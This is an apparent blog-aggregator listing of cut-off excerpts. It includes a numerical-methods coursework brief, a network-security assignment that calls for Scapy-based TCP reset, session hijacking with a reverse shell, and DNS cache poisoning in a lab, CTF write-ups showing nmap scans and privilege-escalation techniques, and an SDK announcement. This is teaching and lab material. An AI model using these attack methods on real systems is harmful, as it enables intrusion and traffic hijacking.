(21-22) MS Teamby using the code fnen7oo.• For those of you that wish to go to the time-table allocated locations, please be aware that thereis limited space: Thursdays (3-4pm) is in Pharmacy A06 (small seminar room with capacity of 33) andWednesdays (9-10am) is in Clive Granger (computer room with capacity of 68). You can find the lecturerthere during these sessions.Piazza:• You are allowed and certainly encouraged(!) to also ask questions using Piazza to obtain clarificationof the coursework questions, as well as general Python queries.• However, when using Piazza, please ensure that you are not revealing any answers to others. Also,School of Mathematical Sciences — Version: 19th October, 2021 — Lecturer: Dr Kris van der Zee Page 1 of 5please ensure that you are not directly revealing any code that you wrote. Doing so is consideredAcademic Misconduct.• When in doubt, please simply arrange a 1-on-1 meeting with the PGR Teaching Assistants or Lecturersduring the Online 1-on-1 Support Sessions (Thursdays 3-4pm and Wednesdays 9-10am).Some Further Advice:• You are expected to have basic familiarity with Python, in particular: logic and loops, functions, NumPyand matplotlib.pyplot. Note that it will always be assumed that the package numpy is imported as np,and matplotlib.pyplot as plt.• Helpful resources: Python 3 Online Documentation – Spyder IDE (integrated development editor) –NumPy User Guide – Matplotlib Usage Guide – Moodle Page Core Programming 2020-2021 (Lecturedby Fredrik Stromberg),• Write your code as neatly and read-able as possible so that it is easy to follow. Add some commentsto your code that indicate what a piece of code does. Frequently run your code to check for (andimmediately resolve) mistakes and bugs.• Coursework Questions with a “?” are more tedious, but can be safely skipped, as they don’t affectfollow-up questions.Submission Procedure:• Submission will open after 21 October 2021.• To submit, simply upload the requested .py-files on Moodle. (Your submission will be checked forplagiarism using turnitin.)• Your work will be marked (mostly) automatically: This is done by running your functions and comparingtheir output against the true results.Getting Started:• Download the contents of the “Coursework 1 Pack” folder from Moodle into a single folder.(More files may be added in later weeks.)• Open Spyder (see instructions above), and if you wish you can watch a basic intro video from theSpyder website (click “Watch video”).• You can also watch the recording of Lecture 1, second hour, where a brief demonstration was given.I Bisection methodLet f(x) = x3 + x2 − 2x − 2. Note that this is the same function as in Lecture 1.Consider the bisection method for finding the root of f in the interval [1, 2].1 Open the py-file just trying out.py from the Coursework 1 Pack (from Moodle),and add your code to it:• First simply plot the function to get an idea of what it looks like.Hint: Use matplotlib.pyplot; see, e.g., the Matplotlib Usage Guide.• Then try implementing the bisection algorithm as explained in Lecture 1.Hint: The Lecture 1 SlidesAndNotes PDF contains a pseudo-code algorithmfor bisection, as well as a simple Python code. This was also demonstrated inLecture 1.• Verify that the first few approximations are correct. What value do your approximationsseem to converge to?2 Next, you will repeat what you have done above, but now by writing a moduleCoursework 1 Page 2 of 5(a .py file) with a function for the entire algorithm. To get started, open the filerootfinders.py. Note that this file contains already an unfinished function withthe following signature:def bisection (f ,a ,b , Nmax )This function returns a numpy.ndarray p vec p array, ← Sentencecorrected on19 Oct 11amshape (Nmax, ), whichis a 1-D array of the approximations pn (n = 1, 2, . . .) computed by the bisectionmethod. The input f can be a lambda function or function defined using def, aand b define the initial interval [a, b] of interest, and Nmax is the maximum numberof iterations.• Complete this function so that it implements the bisection algorithm, and providesthe output as required above.• Test your function by running the main.py file, which contains the following:import numpy as npimport matplotlib . pyplot as pltimport rootfinders as rf ...

October 24, 2021 · 8 min · jiezi

关于安全:MATH2019

MATH2019 Introduction to Scientific Computation— Coursework 1 (10%) —Submission deadline: 3pm, Tuesday, 2 Nov 2021Note: This is currently version 2.2 of the PDF document. (19th October, 2021)Further questions will be added to this PDF in the upcoming weeks.This coursework contributes 10% towards the overall grade for the module.Rules:• Each student is to submit their own coursework.• You are allowed to work together and discuss in small groups (2 to 3 people), but you must write yourown coursework and program all code by yourself.• Please be informed of the UoN Academic Misconduct Policy (incl. plagiarism, false authorship, andcollusion).Coursework Aim and Coding Environment:• In this coursework you will develop Python code related to algorithms that solve nonlinear equations,and you will study some of the algorithms’ behaviour.• As discussed in the lecture, you should write (and submit) plain Python code (.py), and you are stronglyencouraged to use the Spyder IDE (integrated development environment). Hence you should not writeIPython Notebooks (.ipynb), and you should not use Jupyter).How and Where to run Spyder:• Spyder comes as part of the Anaconda package (recall that Jupyter is also part of Anaconda). Hereare three options on how to run Spyder:(1) You can choose to install Anaconda on you personal device (if not done already).(2) You can open Anaconda on any University of Nottingham computer.(3) You can open a UoN Virtual Desktop on your own personal device, which is virtually the same aslogging onto a University of Nottingham computer, but through the virtual desktop. The simply openAnaconda. Here is further info on the UoN Virtual Desktop.• The A18 Computer Room in the Mathematical Sciences building has a number of computers available,as well as desks with dual monitors that you can plug into your own laptop.Online 1-on-1 Support and Time-tabled Support Sessions (Thu 3-4pm, Wed 9-10am):• You can work on the coursework whenever you prefer.• We especially encourage you to work on it during the time-tabled computing and drop-in sessions(Thursdays 3-4pm and Wednesdays 9-10am). There is no need to come to the time-table allocatedlocations, as you can obtain online 1-on-1 support via MS Teams from PGR Student Teaching Assistants.• To obtain online 1-on-1 support during these sessions, please join the MATH2019 (21-22) MS Teamby using the code fnen7oo.• For those of you that wish to go to the time-table allocated locations, please be aware that thereis limited space: Thursdays (3-4pm) is in Pharmacy A06 (small seminar room with capacity of 33) andWednesdays (9-10am) is in Clive Granger (computer room with capacity of 68). You can find the lecturerthere during these sessions.Piazza:• You are allowed and certainly encouraged(!) to also ask questions using Piazza to obtain clarificationof the coursework questions, as well as general Python queries.• However, when using Piazza, please ensure that you are not revealing any answers to others. Also,School of Mathematical Sciences — Version: 19th October, 2021 — Lecturer: Dr Kris van der Zee Page 1 of 5please ensure that you are not directly revealing any code that you wrote. Doing so is consideredAcademic Misconduct.• When in doubt, please simply arrange a 1-on-1 meeting with the PGR Teaching Assistants or Lecturersduring the Online 1-on-1 Support Sessions (Thursdays 3-4pm and Wednesdays 9-10am).Some Further Advice:• You are expected to have basic familiarity with Python, in particular: logic and loops, functions, NumPyand matplotlib.pyplot. Note that it will always be assumed that the package numpy is imported as np,and matplotlib.pyplot as plt.• Helpful resources: Python 3 Online Documentation – Spyder IDE (integrated development editor) –NumPy User Guide – Matplotlib Usage Guide – Moodle Page Core Programming 2020-2021 (Lecturedby Fredrik Stromberg),• Write your code as neatly and read-able as possible so that it is easy to follow. Add some commentsto your code that indicate what a piece of code does. Frequently run your code to check for (andimmediately resolve) mistakes and bugs.• Coursework Questions with a “?” are more tedious, but can be safely skipped, as they don’t affectfollow-up questions.Submission Procedure:• Submission will open after 21 October 2021.• To submit, simply upload the requested .py-files on Moodle. (Your submission will be checked forplagiarism using turnitin.)• Your work will be marked (mostly) automatically: This is done by running your functions and comparingtheir output against the true results.Getting Started:• Download the contents of the “Coursework 1 Pack” folder from Moodle into a single folder.(More files may be added in later weeks.)• Open Spyder (see instructions above), and if you wish you can watch a basic intro video from theSpyder website (click “Watch video”).• You can also watch the recording of Lecture 1, second hour, where a brief demonstration was given.I Bisection methodLet f(x) = x3 + x2 − 2x − 2. Note that this is the same function as in Lecture 1.Consider the bisection method for finding the root of f in the interval [1, 2].1 Open the py-file just trying out.py from the Coursework 1 Pack (from Moodle),and add your code to it:• First simply plot the function to get an idea of what it looks like.Hint: Use matplotlib.pyplot; see, e.g., the Matplotlib Usage Guide.• Then try implementing the bisection algorithm as explained in Lecture 1.Hint: The Lecture 1 SlidesAndNotes PDF contains a pseudo-code algorithmfor bisection, as well as a simple Python code. This was also demonstrated inLecture 1.• Verify that the first few approximations are correct. What value do your approximationsseem to converge to?2 Next, you will repeat what you have done above, but now by writing a moduleCoursework 1 Page 2 of 5(a .py file) with a function for the entire algorithm. To get started, open the filerootfinders.py. Note that this file contains already an unfinished function withthe following signature:def bisection (f ,a ,b , Nmax )This function returns a numpy.ndarray p vec p array, ← Sentencecorrected on19 Oct 11amshape (Nmax, ), whichis a 1-D array of the approximations pn (n = 1, 2, . . .) computed by the bisectionmethod. The input f can be a lambda function or function defined using def, aand b define the initial interval [a, b] of interest, and Nmax is the maximum numberof iterations.• Complete this function so that it implements the bisection algorithm, and providesthe output as required above.• Test your function by running the main.py file, which contains the following:import numpy as npimport matplotlib . pyplot as pltimport rootfinders as rf ...

October 24, 2021 · 8 min · jiezi

关于安全:FIT5037-网络安全

FIT5037 AssignmentFIT5037 Network Security Assignment (S2 2021)Total Marks 100Due on October 17th, Sunday, 11:59:59 am1 OverviewThe learning objective of this assignment is for you to gain a first-hand experience on network attacks (i.e.,TCP and DNS attacks) and get a deeper understanding on how to launch these attacks in practice. Alltasks in this assignment can be done on the virtual machinehttps://cloudstor.aarnet.edu.... as used in Lab Week 8-Network Attacks.2 Submission PolicyYou need to submit a lab report (one single PDF file) to describe what you have done and what you haveobserved with screen shots whenever necessary; you also need to provide explanation or codes to theobservations that are related to the tasks. In your report, you are expected to answer all the questionslisted in this manual. Typeset your report into .pdf format (make sure it can be opened with AdobeReader) and name it as the format: [Your Name]-[Student ID]-FIT5037-Assignment, e.g.,HarryPotter-12345678-FIT5037-Assignment.pdf.All source code if required should be embedded in your report. In addition, if a demonstration video isrequired, you should record your screen demonstration with your voice explanation and upload the videoto your Monash Google Drive. For video demonstration, you are required to say your name andstudent ID at the start of recording, showing face is optional. The shared URL of the videoshould be mentioned in your report wherever required. You can use this free tool to make the video:https://monash-panopto.aarnet...; other tools are also fine. Then, please upload the PDF file toMoodle. Note: the assignment is due on October 17th, 2021, Sunday, 11:59:59 am (Firm!).Late submission penalty: 10-point deduction per day. If you require a special consideration, theapplication should be submitted and notified at least three days in advance. Zero tolerance on plagiarism:If you are found cheating, penalties will be applied, i.e., a zero grade for the unit. The demonstrationvideo is also used to detect/avoid plagiarism. University polices can be found athttps://www.monash.edu/studen...3 Environment SetupIn this section, you need to double check whether you have configured GNS3 correctly. We will be usingthe Week08 lab configuration, i.e., your GNS3 configuration should look like below:Figure 1: GNS3 ConfigOtherwise, if you just downloaded the VM for the first time, we refer you to Environment Setup1FIT5037 Assignment(https://lms.monash.edu/mod/re...) in Week 01. It is recommended toperform lab taskts of Week08 before proceeding.4 TCP Attacks – Using Scapy [40 Marks]The Transmission Control Protocol (TCP) is a core protocol of the Internet protocol suite. It sits on topof the IP layer, and provides a reliable and ordered communication channel between applications runningon networked computers. TCP is in a layer called Transport layer, which provides host-to-hostcommunication services for applications. To achieve such reliable and order communication, TCP requiresboth ends of a communication to maintain a connection. Unfortunately, when TCP was developed, nosecurity mechanism was built into this protocol, making it possible for attackers to eavesdrop onconnections, break connections or hijack connections. In this section, you are required to perform theseattacks using Scapy—a packet manipulation tool for computer networks written in Python.4.1 Task 1: TCP Reset Attacks [15 Marks]In the stream of packets of a TCP connection, each packet contains a TCP header. In the header, there isa bit known as the ”reset” (RST) flag. In most packets, this bit is set to 0 and has no effect; however, ifthis bit is set to 1, it indicates that the receiver should immediately stop using the TCP connection. Thatmeans it should not send back any more packets using the connection’s identifying numbers, called ports,and discard any further packets with headers belong to that connection. A TCP reset basically kills aTCP connection instantly.It is possible for a third computer (aka attacker) to monitor the TCP packets on the connection and thensend a ”forged” packet containing a TCP reset to one or both endpoints. The headers in the forged packetmust indicate, falsely, that it came from an endpoint, not the forger. This information includes theendpoint IP addresses and port numbers. Every field in the IP and TCP headers must be set to aconvincing forged value for the fake reset to trick the endpoint into closing the TCP connection.The idea is quite simple: to break up a TCP connection between A and B, the attacker just spoofs a TCPRST packet from A to B or from B to A.Q1: Connect from Internal-Client to Internal-Server using SSH (use apt install ssh if SSHis not installed), the username and password are same: msfadmin. Perform TCP RST attack,from Internal-Attacker workstation, on SSH service using Scapy (python-based) packet generator.Internal-Client terminal should show the connection is terminated. Please submit your python codeand the steps, along with video link showing that you have performed the attack. (Python code: 5marks, explanation during recording demonstration: 5 marks)Q2: Briefly explain the TCP RST attack and propose at least two theoretical countermeasures. You donot have to do any configuration/implementation for this task. (Explanation: 2.5 marks, counter-measures: 2.5 marks)4.2 Task 2: TCP Session Hijacking Attacks [25 Marks]Once a TCP client and server finish the three-way handshake protocol, a connection is established, and wecall it a TCP session. From then on, both ends can send data to each other. Since a computer can havemultiple concurrent TCP sessions with other computers, when it receives a packet, it needs to know whichTCP session the packet belongs to. TCP uses four elements to make that decision, i.e., to uniquelyidentify a session: (1) source IP address, (2) destination IP address, (3) source port number, and (4)destination port number.We call these four fields as the signature of a TCP session. As we have already learned, spoofing packets isnot difficult. What if we spoof a TCP packet, whose signature matches that of an existing TCP session onthe target machine? Will this packet be accepted by the target? Clearly, if the above four elements matchwith the signature of the session, the receiver cannot tell whether the packet comes from the real sender oran attacker, so it considers the packet as belonging to the session.2FIT5037 AssignmentHowever, for the packet to be accepted, one more critical condition needs to be satisfied. It is the TCPsequence number. TCP is a connection-oriented protocol and treats data as a stream, so each octet in theTCP session has a unique sequence number, identifying its position in the stream. The TCP headercontains a 32-bit sequence number field, which contains the sequence number of the first octet in thepayload. When the receiver gets a TCP packet, it places the TCP data (payload) in a buffer; whereexactly the payload is placed inside the buffer depends on the sequence number. This way, even if TCPpackets arrive out of order, TCP can always place their data in the buffer using the correct order.The objective of this task is to hijack an existing TCP connection (session) between client and server byinjecting malicious contents into their session.Q3: Connect TELNET from Internal-Client to Internal-Server, the username and password aresame: msfadmin. Write a python code, using Scapy, which can inject packets in the TELNET communica-tion, the goal is to make a directory called “attacker” at the Internal-Server (as seen in the screenshotbelow). You can use Internal-Attacker workstation to run the python code. Submit python code andsteps, along with video link that demonstrates you have performed the attack. (Python code: 5 marks,explanation during recording demonstration: 5 marks)Figure 2: Directories in Internal-ServerQ4: Connect TELNET from Internal-Client to Internal-Server. The objective is to get a reverseshell from Internal-Server. Reverse shell is a shell process running on a remote machine, connectingback to the attacker’s machine. We are omitting the details of reverse shell and encourage students toresearch about it, you can start from here: https://hackernoon.com/revers...Write a python code, using Scapy, which can inject packets in TELNET communication and create areverse shell from Internal-Server to Internal-Attacker (as seen in the screenshot below, in this casethe Internal-Server’s IP address is 10.10.10.197). Submit python code and steps, along with video linkshowing that you have performed the attack. (Python code: 5 marks, explanation during recordingdemonstration: 5 marks)Figure 3: Receiving reverse shellQ5: Connect SSH from Internal-Client to Internal-Server, the username and password are same:msfadmin. Perform same TCP hijacking attacks as you did for TELNET, i.e. make attacker directory inInternal-Server and create a reverse shell from Internal-Server to Internal-Attacker by hijackingSSH connection. If your attacks are successful, please submit python code and steps, along with videolink showing that you have performed the attacks. If your attacks were unsuccessful, explain the reason indetail. (Python Code and Explanation during recording demonstration: 5 marks)5 DNS Attacks – Using Scapy [60 Marks]Domain Name System (DNS) is an essential component of the Internet infrastructure. It serves as thephone book for the Internet, so computers can look up for “telephone number” (i.e. IP addresses) fromdomain names. Without knowing the IP address, computers will not be able to communicate with oneanother. Due to its importance, the DNS infrastructure faces frequent attacks. In this section, you willexplore the most primary attack on DNS. That is DNS cache poisoning by investigating both Local andRemote DNS cache poisoning attacks.3FIT5037 AssignmentDue to the large number of computers and networks on the Internet, the domain namespace is organised ina hierarchical tree-like structure. Each node on the tree is called a domain or sub-domain when referencingto its parent node. The following figure depicts a part of the domain hierarchy.Figure 4: Domain hierarchyThe domain hierarchy tree structure describes how the domain namespace is organised, but that is notexactly how the domain name systems are organised. Domain name systems are organised according tozones. A DNS zone basically groups contiguous domains and sub-domains on the domain tree, and assignthe management authority to an entity. Each zone is managed by an authority, while a domain does notindicate any authority information. The following figure depicts an example of the example.com domain.Figure 5: DNS ZonesAssume that example.com in the above figure is an international company, with branches all over theworld, so the company’s domain is further divided into multiple sub-domains, including usa.example.com,uk.example.com, and france.example.com. Inside US, the usa sub-domain is further divided intochicago, boston, and nyc subdomains.Each DNS zone has at least one authoritative nameserver that publishes information about that zone. Thegoal of a DNS query is to eventually ask the authoritative DNS server for answers. That is why they arecalled authoritative because they provide the original and definitive answers to DNS queries, as opposed toobtaining the answers from other DNS servers.With such arrangement, the root zone for example.com only needs to keep records of who the authority isfor each of its subdomains. By doing this, it maintains the independence among the branches in differentcountries and enable the administrative right of those subdomains, so the branch in each country managesits own DNS information. For a given DNS query, if your local DNS server does not the answer, it will askother DNS servers on the Internet for answer via hierarchical authority servers. The following exampledemonstrates a dig (DNS query) for the domain www.example.net when sending the query directly to oneof the root server (i.e. a.root-servers.net).4FIT5037 AssignmentFigure 6: DIG to the root serverThere are four types of sections in a DNS response: question section, answer section, authority section, andadditional section. From the above result, we can see that the root server does not know the answer(because the reply does not include an answer section, but it tells several authoritative nameservers for thenet zone (the NS records in the authority section), along with their IP address if possible in the additionalsection). If you continuously dig the domain www.example.net on one these authoritative nameservers,you will finally end up with the answer section showing the IP address of the machine hosting the websitefor www.example.net.When your local DNS server gets information from other DNS servers, it caches the information, so if thesame information is needed, it will not waste time to ask again.5.1 Task 3: Local DNS Attack targeting Authority Nameserver [20 Marks]We recalled that a DNS response contains question section, answer section, authority section, andadditional section. If we only target the answer section, the attack only affects one hostname (as we did inour Week08 lab “DNS Spoofing Attacks”). Real DNS attacks usually target the authority section byproviding a fake NS record for the target domain in the authority section. If the fake NS record is cached,when the victim local DNS server tries to find any IP address in the target domain, it will send a requestto the malicious nameserver specified in the fake NS record. Such an attack can affect all the hostnames inthe target domain. In this task, you will explore how to target the authority server of example.net andmanage to replace it with ns1.attacker.com and ns2.attacker.com.Q6: Submit your python code and write comments in the code step by step to perform the DNS spoofingattack that modifies the authority server of example.net to be ns1.attacker.com and ns2.attacker.com.Use Internal-Client as victim and Internal-Attacker as the attacker machine. (Python code: 10marks). If the attack works, you should see the result as in following figures for which the maliciousauthoritative servers are taken place.5FIT5037 AssignmentFigure 7: Q6Q7: Provide your explanation in video demonstration to support your above DNS spoofing attack. (Ex-planation and attack’s results: 5 marks, highlight Wireshark packet monitor in the video: 5marks)5.2 Task 4: Remote DNS Attack targeting Authority Server [40 Marks]For this task, the attacker (Internal-Attacker) and DNS server need to be in different LAN. We willmove DNS server to Server LAN and configure its IP statically. The GNS3 configuration for this taskshould look like below:Figure 8: GNS3 for Remote DNS Attacks6FIT5037 AssignmentConfigure static IP for DNS:Figure 9: Static IP config for DNSNow login to Internal-FW (username is ‘admin’, no password), and execute the following to disable NAT:ip firewall nat remove 0The previous local DNS attacks assume that the attacker and the DNS victim server are on the same LANso that she can observe the DNS query message and reply with a forged DNS packet. When the attackerand the DNS server are not on the same LAN, the attack becomes harder since the attacker cannotperform ARP poisoning attack and see the DNS query. When the DNS victim server cannot resolve theDNS query, it will forward the DNS query packet to the forwarder DNS server (Google DNS server in ourcurrent setup). The DNS query is sent via a UDP packet where the UDP’s source port is a 16-bit randomnumber. In addition, the 16-bit transaction ID in the DNS header is also self-created by the DNS victimserver. Hence, if the remote attacker wants to forge the DNS response, the forged packet must contain thecorrect values of these two numbers; otherwise, the reply will not be accepted.Without being able to sniff the query packet, the remote attacker can only guess these two numbers. Thechance is one out of 232 for each guess. If an attacker can send out 1000 spoofed responses, it may takeseveral days to try up 232 time. In contrast, it only takes few seconds to receive the correct packetresponse from the forwarder Google DNS. Consequently, that real reply will be cached by the local DNSvictim server. To make another try, the attacker has to wait for the server to send out another DNS querywhen its cache times out. Hence, this attacking chance makes the remote DNS attack unrealistic.The remote DNS attack had become an open problem until Dan Kaminsky came up with a simple solutionin 2008. The attack is depicted in the following figure.Figure 10: Kaminsky Attack7FIT5037 AssignmentWe choose a domain test.com as our targeted domain name in this task. When a client queries the DNSserver for www.test.com, the attacker (Internal-Attacker) wants to cause the DNS server to use her DNSserver (ns.attacker.com). The following steps with reference to above figure describe the outline of theattack. ...

October 22, 2021 · 16 min · jiezi

关于安全:Tryhackme0dayshellshock内核漏洞提权

服务扫描┌──(rootkali)-[~/tryhackme/0day]└─# nmap -sV -Pn -A -O 10.10.209.66 130 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-21 03:52 EDTNmap scan report for 10.10.209.66Host is up (0.28s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)80/tcp open http Apache httpd 2.4.7 ((Ubuntu))|_http-server-header: Apache/2.4.7 (Ubuntu)|_http-title: 0dayAggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel开启了ssh和http服务 ...

October 21, 2021 · 5 min · jiezi

关于安全:百度安全-TrustZone-SDK-正式成为-OPTEE-官方推荐-Rust-开发环境

百度平安与 OP-TEE 社区独特单干,推动 Teacalve TrustZone SDK 正式成为 OP-TEE 官网举荐的 Rust 开发环境。OP-TEE 是当今宽泛应用的开源 ARM TrustZone 操作系统和执行环境,是由 ARM、Linaro、Google、NXP 等组织独特保护等可信固件社区(Trusted Firmware)我的项目,可信固件社区为 ARM 平安生态提供了根底执行环境的开源实现。在十月最新公布的 OP-TEE 3.15.0 中,开发者就可能应用 SDK 开发内存平安的 TrustZone 利用,咱们也提供了泛滥的样例程序帮忙开发者疾速上手应用。 百度平安开源奉献的 Apache Teaclave (incubating) 子项目 Teaclave TrustZone SDK,为OP-TEE 提供了一套内存平安、使用方便的 SDK。SDK 基于 GlobalPlatform 的 TEE 规范,为开发者提供规范的开发接口。除此之外 Rust OP-TEE TrustZone SDK 反对规范库和第三方库,进步了 TA 的开发速度,并扩大了 TrustZone 的利用场景。与 Teaclave SGX SDK 相似,TrustZone SDK 也为 Teaclave 隐衷平安计算平台提供底层反对,赋能多平台可信执行环境的隐衷平安计算生态。 疾速上手上面简略介绍一下如何疾速上手尝试 Rust 开发的 TrustZone TA,更多具体文档能够在 Teclave 官网(https://teaclave.apache.org/)查看。下载 Teaclave TrustZone SDK 我的项目,初始化相干的子模块并装置 Rust 工具链以及穿插编译工具 Xargo:$ git clone https://github.com/apache/inc...$ cd incubator-teaclave-trustzone-sdk$ ./setup.sh初始化 OP-TEE 子模块。初始化结束之后,在 optee 根目录下须要有 build/, optee_os/ 和 optee_client 子目录。$ git submodule update --init -- optee设置环境变量,默认状况下,指标平台是 aarch64,如果心愿为 arm 平台编译,须要在 source environment 之前设置 ARCH 变量。$ source environment最初,编译 Teaclave TrustZone SDK 官网提供的例子。$ make examples当初,示例曾经全副编译好了,在反对 OP-TEE 的 QEMU 环境即可尝试运行曾经编译好的 SDK 中的 TrustZone 利用示例。 ...

October 21, 2021 · 1 min · jiezi

关于安全:MFIN6003-安全

MFIN6003 Derivative Securities Group Project #1Due date: Session 6The aim of this project is to get familiar with your group members, the Hang Seng IndexFutures, and the mark-to-market process in futures trading.Submission of the project: each group is required to submit their write-ups in PDF in thecourse Moodle page by the due date. Include a cover page with the information of all group members (name, universitynumber, and email address) and the group number. Only PDF file will be accepted by the system and the submission system closes at11:59pm on the due date. ...

October 20, 2021 · 6 min · jiezi

关于安全:TryhackmetomghostJserv文件读取pgp解密sudo滥用zip

服务扫描┌──(rootkali)-[~/tryhackme/tomghost]└─# nmap -sV -Pn 10.10.55.149 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-20 04:27 EDTNmap scan report for 10.10.55.149Host is up (0.31s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)53/tcp open tcpwrapped8009/tcp open ajp13 Apache Jserv (Protocol v1.3)8080/tcp open http Apache Tomcat 9.0.30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 96.60 seconds在谷歌上搜寻Apache Jserv (Protocol v1.3),发现此软件存在一个破绽 ...

October 20, 2021 · 3 min · jiezi

关于安全:TryhackmeBiohazard各种加解密sudo滥用

服务发现┌──(rootkali)-[~/tryhackme/biohazard]└─# nmap -sV -Pn 10.10.38.183 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-19 04:07 EDTNmap scan report for 10.10.38.183Host is up (0.30s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 49.55 seconds问题:How many open ports?答案:3关上80端口首页,依据文字描述得悉team name问题:What is the team name in operation答案:STARS alpha team页面:/mansionmain/源代码显示一行正文 ...

October 20, 2021 · 6 min · jiezi

关于安全:FFXIV-Mini-Cactpot

FFXIV: Mini CactpotOverviewMini Cactpot is a daily activity of the famous MMORPG Final Fantasy XIV. Players will be able to winManderville Gold Saucer Points(MGP) through this lottery system. Similar to a scratch-off lottery ticket,you'll reveal numbers, and depending on the sum of the numbers the rewards you can obtain will differ.In Mini Cactpot, every ticket has nine spaces, each numbered randomly from one to nine. At the start,however, eight of these nine spaces will be hidden. To begin, select three numbers to uncover from theeight hidden on your ticket.Next, select one of eight lines, vertical, horizontal, or diagonal. When selecting a line, the sum of the threenumbers in that line will determine the amount of MGP you receive.After you have selected a line, all the numbers are uncovered and you will receive MGP based on the sum ofthe line you chose.Q7 often struggles with which line is the optimal choice given the 4 uncovered numbers. Can you design analgorithm to help Q7 choose the line with the highest expected amount of MGP?Q1: Naive SolverIn this part, you are a cheater that can choose a best line with all the numbers uncovered.Your should implement the solveq1 method with a list as its argument denotes the 9 numbers, e.g. [[7,6, 9], [4, 5, 3], [2, 1, 8]]. It should return the maximum amount of MGP the player can win by choosing anoptimal line.In this case, the answer should be 306.Explanation: The optimal line to choose is the 3rd column, the sum is 20 and the corresponding reward is306 MGP.Q2: Real SolverIn this part, you no longer have all the numbers uncovered but only have 4 instead.Your should implement the solveq2 method with a list as its argument denotes the 9 numbers, e.g. [[0,6, 0], [4, 0, 3], [2, 0, 0]]. It should return the maximum expected amount of MGP (only keep the integer part)the player can win by choosing an optimal line.In this case, the answer should be 580.Explanation: The expected rewards that can be obtained by choosing three rows are 389,226,180, therewards that can be obtained by three columns are 118,389,168, and those of the two diagonals are 580,180.So the optimal choice is the main diagonal, and the corresponding expected reward is 580 MGP.Grading CriteriaThe assignment has two parts, with the first part Naive Solver accounting for 30 points and thesecond part Real Solver 70 points.Online submissions close at 11:59 on Sunday, October 17. No late submission is allowed.You can submit up to 20 times. After this threshold, each additional submission is penalized by 10% ofpoints. Only the last submission will be recorded for your final score.The code you submit will be archived and kept by the university, so please be mindful of academicintegrity.No third-party library is allowed, but you can use built-in libraries such as copy and itertools .Code Template ...

October 20, 2021 · 4 min · jiezi

关于安全:TryhackmeAnonymousFTP匿名登录Cron任务反弹shellSUID提权env

服务发现┌──(rootkali)-[~/tryhackme/Anonymous]└─# nmap -sV -Pn 10.10.249.116 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-18 06:12 EDTNmap scan report for 10.10.249.116Host is up (0.31s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.0.8 or later22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.67 seconds剖析只有4个服务端口,没有http,能够先答复后面三个问题 ...

October 19, 2021 · 4 min · jiezi

关于安全:谋数为先数据驱动创新大会-1028-精彩将至

